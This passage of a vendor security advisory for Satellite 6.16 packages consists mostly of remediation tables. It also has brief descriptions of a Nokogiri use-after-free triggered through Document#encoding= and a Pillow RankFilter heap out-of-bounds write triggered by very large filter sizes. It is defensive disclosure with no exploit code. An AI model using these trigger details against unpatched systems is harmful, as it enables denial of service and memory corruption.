| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Nokogiri, an XML and HTML library for Ruby. When an attacker provides an invalid encoding to the Document#encoding= function, the library frees the document's current encoding string without replacing it. This leaves the document referencing freed memory, which can lead to a denial of service (DoS) due to a segmentation fault or information disclosure by leaking freed memory into a Ruby String.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch | — |
Workaround
|
|
| Unresolved product id: 8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. The public RankFilter API can trigger a native heap out-of-bounds write when given a very large odd filter size. ImageFilter.RankFilter.filter() calls image.expand(size // 2, size // 2) before rank-filter size validation, and ImagingExpand() computes output dimensions with unchecked signed integer arithmetic. This can lead to denial of service and limited integrity impact via heap corruption.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src | — | ||
| Unresolved product id: 8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64 | — | ||
